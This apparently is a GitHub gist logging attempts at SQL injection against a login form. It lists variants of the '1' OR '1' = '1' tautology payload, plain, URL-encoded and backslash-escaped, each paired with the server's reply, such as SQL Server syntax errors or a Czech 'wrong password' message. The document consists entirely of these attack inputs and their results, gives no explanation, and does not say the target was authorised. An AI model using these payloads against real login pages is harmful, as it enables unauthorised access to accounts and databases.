Skip to content

Instantly share code, notes, and snippets.

@jreisinger
Created May 10, 2013 13:37
Show Gist options
  • Save jreisinger/5554430 to your computer and use it in GitHub Desktop.
Save jreisinger/5554430 to your computer and use it in GitHub Desktop.
'1' OR '1' = '1'
1'%20or%20'1'%20=%20'1
----
UserName='1'%20or%20'1'%20=%20'1'
Password=1%27+or+%271%27+%3D+%271
==> Incorrect syntax near '1'.
----
1%27+or+%271%27+%3D+%271
1%27+or+%271%27+%3D+%271
==> Chybné heslo!
----
1'%20or%20'1'%20=%20'1
test
==> Incorrect syntax near '20'.
----
1' OR '1' = '1
1' OR '1' = '1
==> Chybné heslo!
----
1\' OR \'1 = \'1
1%27 or %271%27 %3D %271
==> Incorrect syntax near '1 = \'.
----
1\' OR \'1 = '1
1%27 or %271%27 %3D %271
==> Incorrect syntax near '1 = '.
----
1\' OR \\'1 = \\'1
1%27 or %271%27 %3D %271
==> Incorrect syntax near '\'.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment